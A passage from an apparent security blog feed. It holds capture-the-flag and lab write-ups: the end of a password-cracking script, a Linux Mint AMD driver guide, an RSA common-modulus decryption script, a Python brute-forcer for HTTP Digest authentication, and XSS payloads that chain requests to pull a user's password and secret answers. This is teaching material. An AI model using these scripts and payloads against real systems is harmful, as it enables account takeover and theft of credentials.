class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">board_pass_length</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] FreeB0aRd Password = "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">board_pass</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">" ---------------------------------- </span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">challenge</span> <span class="o">=</span> <span class="n">Challenge2</span><span class="p">()</span> <span class="n">challenge</span><span class="p">.</span><span class="n">length_password</span><span class="p">(</span><span class="s">'admin'</span><span class="p">)</span> <span class="n">challenge</span><span class="p">.</span><span class="n">length_password</span><span class="p">(</span><span class="s">'FreeB0aRd'</span><span class="p">)</span> <span class="n">challenge</span><span class="p">.</span><span class="n">crack_password</span><span class="p">(</span><span class="s">'admin'</span><span class="p">,</span> <span class="mi">10</span><span class="p">)</span> <span class="n">challenge</span><span class="p">.</span><span class="n">crack_password</span><span class="p">(</span><span class="s">'FreeB0aRd'</span><span class="p">,</span> <span class="mi">9</span><span class="p">)</span> <span class="n">challenge</span><span class="p">.</span><span class="n">print_vaules</span><span class="p">()</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span></code></pre></figure> <p><a class="btn btn-default" href="https://github.com/lucif3rr/Exploits-and-Scripts/blob/master/0ldzombie-Web/0ldzombie-challenge2.py">Grab the script from Github</a></p> <p>So from this, you can get both the passwords, ie, the admin password and the board password. If you try to login with the board password, you will get a zip file to download which is password protected. Now login as <code class="language-plaintext highlighter-rouge">admin</code> in “admin/” page and you can get the password to unlock the zip archive.</p> <p>If you solved the challenge in an easier way, do let me know. Let us share and learn :)</p> Fri, 12 Jun 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/06/12/0ldzombie-2/ https://blog.0daylabs.com/2015/06/12/0ldzombie-2/ 0ldzombie WebChallenges [How to] Install ATI AMD drivers in Linux Mint 17.1 Rebecca <p>Linux Mint, as you all know, is one of the most popular Linux distribution till date and it is rated as the most downloaded Linux OS by <a href="http://distrowatch.com/dwres.php?resource=popularity">distrowatch</a>. The very recent version of Linux Mint, called “<strong>Rebecca</strong>”, is a long term support edition from the Mint team till 2019. Rebecca comes with several new features that makes the desktop experience smoother than ever. It comes pre-packed with several improvements which include system performance improvement, more privacy and language settings, and improved hardware support.</p> <p>As always, one of the biggest challenges for a person installing a latest Linux version is that, it should support the graphics card drivers. And if you mess up with graphics configuration, you will end up crashing the xserver and it will fail to start. So here is a good way to install AMD/ATI drivers properly in Linux Mint without affecting any of the configuration:</p> <ul> <li> <p>Before installing the driver, make sure you install** Linux generic headers**.</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get install linux-headers-generic</code></p> </li> <li> <p>Linux Mint doesn’t come with fglrx which is actually good for us, as we don’t have to remove it and then re-install it like the way we do in <strong><a href="https://blog.0daylabs.com/2014/04/20/installing-configuring-amdati-drivers-ubuntu-14-04-trusty-tahr/">Ubuntu 14.04</a></strong>.</p> </li> <li> <p>Install <strong>fglrx</strong> via the command below:</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get install fglrx</code></p> </li> <li> <p>If it shows any dependency problems, then do an apt-clean and try again. Execute the following commands and then try again.</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get autoclean</code></p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get update</code></p> </li> <li> <p>If fglrx is installed properly, it is time to install the GUI for controlling the graphics properties. Install fglrx-amdcccle (This is very similar to catalyst control center):</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get install fglrx-amdcccle</code></p> </li> <li> <p>Now let us generate a fresh xorg file (if you are having multiple AMD graphics card or dual graphics, use the next command):</p> <p><code class="language-plaintext highlighter-rouge">sudo amdconfig --initial</code></p> </li> <li> <p>If you are having multiple AMD cards or Dual graphics card, use the following command to generate new xorg file:</p> <p><code class="language-plaintext highlighter-rouge">sudo amdconfig --adapter=all --initial</code></p> </li> <li> <p>Now you can reboot the machine and login to see the drivers working perfectly.</p> </li> </ul> <p><strong>Note:</strong></p> <p>The above method has already been experimented on the latest Linux Mint 17.1 Rebecca release and I am sure it will work well without any problems for you. Also, the same method will work with Linux Mint 17 quiana too.</p> <p>If you come across any problems while doing so, let us know via comments and we are happy to help.</p> Tue, 26 May 2015 08:34:30 -0700 https://blog.0daylabs.com/2015/05/26/installing-amdati-drivers-in-linux-mint-17-1-rebecca/ https://blog.0daylabs.com/2015/05/26/installing-amdati-drivers-in-linux-mint-17-1-rebecca/ linux tutorials RSA: Common Modulus attack with extended Euclidean algorithm <p>RSA, a commonly used public key cryptosystem, is very secure if you use sufficiently large numbers for encryption. Even then there are attacks against it. If you are not already familiar with <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)">RSA encryption mechanism</a>, I suggest you read more about it before continuing with this article.</p> <p>Consider a scenario where a person encrypts same plain text, 2 different times, which he sends to 2 different people. Suppose you eavesdropped on the communication and got both the cipher texts (c1, c2) and the exponents(e1, e2) he used. You already know his Modulus N which is public. So is there a way you can decipher this ? Well the answer is yes.</p> <p>In order to decrypt it, we use an algorithm called <strong>extended euclidean</strong> which makes our tasks much easier. But another condition we need to decrypt this is that the <code class="language-plaintext highlighter-rouge">gcd(e1, e2) = 1</code></p> <p>You must be thinking that why the hell did I just say gcd(e1, e2) should be equal to 1 ? Well here is the answer:</p> <p>If you already know how the RSA encryption works, then by now you would have understood that</p> <p><code class="language-plaintext highlighter-rouge">c1 = m^e1 % N</code> and</p> <p><code class="language-plaintext highlighter-rouge">c2 = m^e2 % N</code></p> <p>Assume that we find out <em><strong>a</strong></em> and <em><strong>b</strong></em> such that <code class="language-plaintext highlighter-rouge">(e1 * a) + (e2 * b) = 1</code> then we can decode the plain text as <code class="language-plaintext highlighter-rouge">(c1 ^ a) + (c2 ^ b)</code>. If we substitute how <strong>c1</strong> and <strong>c2</strong> is calculated to above equation, we can get <code class="language-plaintext highlighter-rouge">m^(e1 * a + e2 * b) = m^1 = m</code></p> <p>Let us see how the algorithm works</p> <p><code class="language-plaintext highlighter-rouge">(e1*a) + (e2*b) = gcd(e1, e2)</code></p> <p>where e is exponents.</p> <p>Now, we need to find <strong><em>a</em></strong> and** <em>b</em><strong>. In order to find <em>a</em>, since <em>gcd(e1, e2) = 1</em>, then we can say that <em>a</em> is the **modular multiplicative inverse</strong> of el and e2. After finding a, we can substitute the value to the above equation so that we can successfully obtain <strong>b</strong>. After getting a and b, we can get back the plain text by applying the equation</p> <p><code class="language-plaintext highlighter-rouge">plain = (c1^a) * (c2^b) %N</code></p> <p>Another issue that can happen here is that, in most of the cases, the value of <strong><em>b</em></strong> will be negative and hence it is difficult to apply in the above equation. So in order to simplify this, we find out another value named <em><strong>i</strong></em>, which is the modular multiplicative inverse of <em>c2</em> w.r.t <em>N</em>. Then we can say <code class="language-plaintext highlighter-rouge">i^-b = c2^b</code>.</p> <p>So now the equation becomes <code class="language-plaintext highlighter-rouge">plain = (c1^a) * (i^-b) %N</code>. This is what we need in order to decrypt the plain text. Let us look into a python script that can automate the above process:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"> <span class="c1">#!/usr/bin/python3.4 </span> <span class="c1"># Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com </span> <span class="c1"># This program will help to decrypt cipher text to plain text if you have </span> <span class="c1"># more than 1 cipher text encrypted with same Modulus (N) but different </span> <span class="c1"># exponents. We use extended Euclideangm Algorithm to achieve this. </span> <span class="n">__author__</span> <span class="o">=</span> <span class="s">'lucif3r'</span> <span class="kn">import</span> <span class="nn">gmpy2</span> <span class="k">class</span> <span class="nc">RSAModuli</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="bp">self</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="mi">0</span> <span class="bp">self</span><span class="p">.</span><span class="n">b</span> <span class="o">=</span> <span class="mi">0</span> <span class="bp">self</span><span class="p">.</span><span class="n">m</span> <span class="o">=</span> <span class="mi">0</span> <span class="bp">self</span><span class="p">.</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">def</span> <span class="nf">gcd</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">num1</span><span class="p">,</span> <span class="n">num2</span><span class="p">):</span> <span class="s">""" This function os used to find the GCD of 2 numbers. :param num1: :param num2: :return: """</span> <span class="k">if</span> <span class="n">num1</span> <span class="o">&lt;</span> <span class="n">num2</span><span class="p">:</span> <span class="n">num1</span><span class="p">,</span> <span class="n">num2</span> <span class="o">=</span> <span class="n">num2</span><span class="p">,</span> <span class="n">num1</span> <span class="k">while</span> <span class="n">num2</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span> <span class="n">num1</span><span class="p">,</span> <span class="n">num2</span> <span class="o">=</span> <span class="n">num2</span><span class="p">,</span> <span class="n">num1</span> <span class="o">%</span> <span class="n">num2</span> <span class="k">return</span> <span class="n">num1</span> <span class="k">def</span> <span class="nf">extended_euclidean</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">e1</span><span class="p">,</span> <span class="n">e2</span><span class="p">):</span> <span class="s">""" The value a is the modular multiplicative inverse of e1 and e2. b is calculated from the eqn: (e1*a) + (e2*b) = gcd(e1, e2) :param e1: exponent 1 :param e2: exponent 2 """</span> <span class="bp">self</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">gmpy2</span><span class="p">.</span><span class="n">invert</span><span class="p">(</span><span class="n">e1</span><span class="p">,</span> <span class="n">e2</span><span class="p">)</span> <span class="bp">self</span><span class="p">.</span><span class="n">b</span> <span class="o">=</span> <span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">gcd</span><span class="p">(</span><span class="n">e1</span><span class="p">,</span> <span class="n">e2</span><span class="p">)</span><span class="o">-</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">a</span><span class="o">*</span><span class="n">e1</span><span class="p">)))</span><span class="o">/</span><span class="nb">float</span><span class="p">(</span><span class="n">e2</span><span class="p">)</span> <span class="k">def</span> <span class="nf">modular_inverse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">c1</span><span class="p">,</span> <span class="n">c2</span><span class="p">,</span> <span class="n">N</span><span class="p">):</span> <span class="s">""" i is the modular multiplicative inverse of c2 and N. i^-b is equal to c2^b. So if the value of b is -ve, we have to find out i and then do i^-b. Final plain text is given by m = (c1^a) * (i^-b) %N :param c1: cipher text 1 :param c2: cipher text 2 :param N: Modulus """</span> <span class="n">i</span> <span class="o">=</span> <span class="n">gmpy2</span><span class="p">.</span><span class="n">invert</span><span class="p">(</span><span class="n">c2</span><span class="p">,</span> <span class="n">N</span><span class="p">)</span> <span class="n">mx</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">c1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">a</span><span class="p">,</span> <span class="n">N</span><span class="p">)</span> <span class="n">my</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="o">-</span><span class="bp">self</span><span class="p">.</span><span class="n">b</span><span class="p">),</span> <span class="n">N</span><span class="p">)</span> <span class="bp">self</span><span class="p">.</span><span class="n">m</span><span class="o">=</span> <span class="n">mx</span> <span class="o">*</span> <span class="n">my</span> <span class="o">%</span> <span class="n">N</span> <span class="k">def</span> <span class="nf">print_value</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">"Plain Text: "</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">m</span><span class="p">)</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">c</span> <span class="o">=</span> <span class="n">RSAModuli</span><span class="p">()</span> <span class="n">N</span> <span class="o">=</span> <span class="n">c1</span> <span class="o">=</span> <span class="n">c2</span> <span class="o">=</span> <span class="n">e1</span> <span class="o">=</span> <span class="n">e2</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">extended_euclidean</span><span class="p">(</span><span class="n">e1</span><span class="p">,</span> <span class="n">e2</span><span class="p">)</span> <span class="n">c</span><span class="p">.</span><span class="n">modular_inverse</span><span class="p">(</span><span class="n">c1</span><span class="p">,</span> <span class="n">c2</span><span class="p">,</span> <span class="n">N</span><span class="p">)</span> <span class="n">c</span><span class="p">.</span><span class="n">print_value</span><span class="p">()</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></figure> <p>So here we deal with 2 function namely extended_euclidean and modular_inverse. The extended_euclidean function will help us in calculating the value of <em><strong>a</strong></em> and <em><strong>b</strong></em>. In almost all the cases, the value of b will be negative and because of that, we will find out <strong>i</strong> in modular_inverse function and also calculate the plain text from the above explained equation.</p> <p>NOTE:</p> <ul> <li> <p>In order to successfully launch an attack, the gcd of e1 and e2 must be equal to 1 or else this may not work.</p> </li> <li> <p>The python script makes use of a library called gmpy2. If you don’t have it already installed on your system, then do this: <code class="language-plaintext highlighter-rouge">sudo apt-get install python3-gmpy2</code></p> </li> <li> <p>When you change the exponents e1, e2 for encrypting the messages it also changes the Private/Public Key Pair. In practice we use the same key pairs so there wont be question of e1/e2 that makes decryption of crypt-text difficult.</p> </li> </ul> <p>If you have any issues related to the above tutorial or if you have a better way of scripting, please don’t hesitate to comment below. We would like to hear from you :)</p> Sat, 17 Jan 2015 08:41:50 -0800 https://blog.0daylabs.com/2015/01/17/rsa-common-modulus-attack-extended-euclidean-algorithm/ https://blog.0daylabs.com/2015/01/17/rsa-common-modulus-attack-extended-euclidean-algorithm/ rsa WAP Challenge 5: Brute forcing Digest Authentication <p>In the last article we saw how can we actually brute force HTTP Basic Authentication, this time we will see how we can do the same in a Digest based Authentication. If you are not already familiar with <a href="http://en.wikipedia.org/wiki/Digest_access_authentication">Digest based authentication</a>, I strongly recommend you to read more about it and then continue with this article. The key difference here is that for an HTTP basic authentication we can simply pass on different username:password combinations and it passes in plain text through the network. But for  a digest based auth, encryption is being introduced so that hackers cannot eavesdrop on the communication between you and the server.</p> <p>Lets us look into the script.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"> <span class="c1">#!/usr/bin/python3.4 </span> <span class="c1"># Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com__author__ = 'lucif3r' </span> <span class="c1"># This is the solution to Pentester Academy's WAP Challenge 4: Digest Authentication Brute- </span> <span class="c1"># Force. The script uses urllib library in python 3.4 </span> <span class="n">__author__</span> <span class="o">=</span> <span class="s">'lucif3r'</span> <span class="kn">import</span> <span class="nn">urllib.request</span> <span class="kn">import</span> <span class="nn">urllib.error</span> <span class="kn">import</span> <span class="nn">itertools</span> <span class="k">def</span> <span class="nf">generate_wordlist</span><span class="p">(</span><span class="n">words</span><span class="p">,</span> <span class="n">l</span><span class="p">):</span> <span class="s">""" :rtype : list :param words The string from which words should be made: :param l length of the strings: :return: """</span> <span class="n">list_pass</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">itertools</span><span class="p">.</span><span class="n">product</span><span class="p">(</span><span class="n">words</span><span class="p">,</span> <span class="n">repeat</span><span class="o">=</span><span class="n">l</span><span class="p">):</span> <span class="n">list_pass</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> <span class="k">return</span> <span class="n">list_pass</span> <span class="k">def</span> <span class="nf">brute_force</span><span class="p">(</span><span class="n">username</span><span class="p">):</span> <span class="s">""" :param username: Username for Brute forcing """</span> <span class="n">url</span> <span class="o">=</span> <span class="s">'http://pentesteracademylab.appspot.com/lab/webapp/digest/1'</span> <span class="n">passwords</span> <span class="o">=</span> <span class="n">generate_wordlist</span><span class="p">(</span><span class="s">'ads'</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"wordlist generated. Starting Brute FOrce..."</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">passwords</span><span class="p">:</span> <span class="n">authhandler</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">HTTPDigestAuthHandler</span><span class="p">()</span> <span class="n">authhandler</span><span class="p">.</span><span class="n">add_password</span><span class="p">(</span><span class="s">'Pentester Academy'</span><span class="p">,</span> <span class="n">url</span><span class="p">,</span> <span class="n">username</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">opener</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">build_opener</span><span class="p">(</span><span class="n">authhandler</span><span class="p">)</span> <span class="n">urllib</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">install_opener</span><span class="p">(</span><span class="n">opener</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">page</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="k">except</span> <span class="n">urllib</span><span class="p">.</span><span class="n">error</span><span class="p">.</span><span class="n">HTTPError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">"failing"</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="k">print</span> <span class="p">(</span><span class="s">'Username: '</span><span class="o">+</span><span class="n">username</span><span class="o">+</span><span class="s">' Password: '</span><span class="o">+</span><span class="n">i</span><span class="p">)</span> <span class="k">break</span> <span class="n">brute_force</span><span class="p">(</span><span class="s">'admin'</span><span class="p">)</span> <span class="n">brute_force</span><span class="p">(</span><span class="s">'nick'</span><span class="p">)</span></code></pre></figure> <p>As you can see, we used the urllib module in python 3.4 to create an <strong>authhandler</strong> which handles the HTTP Digest Authentication along with the password, url and other things. As you can read from the <a href="http://en.wikipedia.org/wiki/Digest_access_authentication">Wikipedia</a> that an md5 hashing is done using the nounce, url, password etc but when we automate this in python, <strong>urllib</strong> will take care of everything for us. We don’t need to bother about it.</p> <p>If you find a better way to complete this or if you are facing any issues regarding to this challenge, don’t hesitate to drop a comment.</p> Fri, 16 Jan 2015 21:05:13 -0800 https://blog.0daylabs.com/2015/01/16/wap-challenge-5-brute-forcing-digest-authentication/ https://blog.0daylabs.com/2015/01/16/wap-challenge-5-brute-forcing-digest-authentication/ python XSS - Multilevel XML Parsing: JS for Pentesters task 21 write up <p>We have already seen and cracked challenges that deals with Multilevel JSON and HTML parsing already. Now let us look into the 3rd one namely parsing XML.</p> <p><a href="pentesteracademylab.appspot.com/lab/webapp/jfp/21">JS for Pentesters task 21</a></p> <p>Our objective of this challenge is to Find John’s Secret Questions+Answers using an XSS vulnerability on this page and Display the Questions+Answers in the div with id “result”. Before carrying in with the challenge, I strongly recommend you to read “<a href="https://blog.0daylabs.com/2014/09/14/ajax-parsing-reading-xml-files-using-ajax/">Ajax: Parsing and reading XML files</a>” for the basics on how to parse and read XML file using Ajax.</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">request</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">((</span><span class="nx">request</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">===</span> <span class="mi">4</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mi">200</span><span class="p">))</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">endpoint</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">responseXML</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">'</span><span class="s1">endpoint</span><span class="dl">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">firstChild</span><span class="p">.</span><span class="nx">nodeValue</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">uid</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">responseXML</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">'</span><span class="s1">uid-param-value</span><span class="dl">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">firstChild</span><span class="p">.</span><span class="nx">nodeValue</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">csrf_token</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">responseXML</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">'</span><span class="s1">token-param-value</span><span class="dl">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">firstChild</span><span class="p">.</span><span class="nx">nodeValue</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">params</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">responseXML</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">'</span><span class="s1">uid-param-value</span><span class="dl">'</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="kd">var</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">endpoint</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">?uid=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">uid</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&amp;token=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">csrf_token</span><span class="p">;</span> <span class="nx">alert</span><span class="p">(</span><span class="nx">url</span><span class="p">);</span> <span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="nx">url</span><span class="p">);</span> <span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">((</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">===</span> <span class="mi">4</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mi">200</span><span class="p">))</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">result</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">()</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">request</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">/lab/webapp/jfp/21/getxml</span><span class="dl">'</span><span class="p">);</span> <span class="nx">request</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Since the response we get from the request is in the format XML, we use the keyword <code class="language-plaintext highlighter-rouge">responseXML</code> instead of responseText. From XML files, we can easily take any values we need just like accessing values from HTML files. Thats why you can see that we are accessing the values we need from the XML document using <code class="language-plaintext highlighter-rouge">document.getElementsByTagName()</code> which is usually used to select data from an HTML file.</p> <p><strong>Note:</strong></p> <p>1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt <code class="language-plaintext highlighter-rouge">XSS</code> stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> <p>By this, we are completing the write ups of <a href="https://blog.0daylabs.com/category-jsp/">Pentester Academy’s JavaScript for Pentesters course challenge write ups</a>. Hope you enjoyed solving the challenges as much as we do :)</p> Mon, 03 Nov 2014 07:54:41 -0800 https://blog.0daylabs.com/2014/11/03/xss-multilevel-xml-parsing-js-pentesters-task-21/ https://blog.0daylabs.com/2014/11/03/xss-multilevel-xml-parsing-js-pentesters-task-21/ jsp javascript xss security-tube XSS - Multilevel JSON Parsing: JS for Pentesters task 20 write up <p>Lately we saw and understood that XMLHttpRequest() is very powerful and it can not only receive strings as response but also HTML, JSON and XML too. We have seen in last challenge on how to do a Multi level HTML Parsing and now let us see how can we do a Multi level JSON parsing.</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/20/">JS for Pentesters task 20</a></p> <p>Our objective is to Find John’s Password using an XSS vulnerability on this page and Display the Password in the div with id “result”. Before continuing with this challenge, I strongly recommend you read the topic “<a href="https://blog.0daylabs.com/2014/09/15/ajax-parsing-reading-json-files/">Ajax:Parsing and reading JSON</a>” which will cover the basics of parsing and reading JSON files with XMLHttpRequest(). I have solved this challenge in a hurry so I am not sure the following is the best solution. But I am sure payload below works ;) .</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">request</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">((</span><span class="nx">request</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">===</span> <span class="mi">4</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mi">200</span><span class="p">))</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">items</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">keys</span> <span class="k">in</span> <span class="nx">items</span><span class="p">)</span> <span class="p">{</span> <span class="nx">tokenid</span> <span class="o">=</span> <span class="nx">items</span><span class="p">[</span><span class="nx">keys</span><span class="p">].</span><span class="nx">token</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">((</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">===</span> <span class="mi">4</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mi">200</span><span class="p">))</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">newitems</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">key</span> <span class="k">in</span> <span class="nx">newitems</span><span class="p">)</span> <span class="p">{</span> <span class="nx">pass</span> <span class="o">=</span> <span class="nx">newitems</span><span class="p">[</span><span class="nx">key</span><span class="p">].</span><span class="nx">password</span><span class="p">;</span> <span class="nx">alert</span><span class="p">(</span><span class="nx">pass</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">/lab/webapp/jfp/20/getpassword?token=</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">tokenid</span><span class="p">);</span> <span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">request</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">/lab/webapp/jfp/20/gettoken?uid=3476</span><span class="dl">'</span><span class="p">);</span> <span class="nx">request</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span 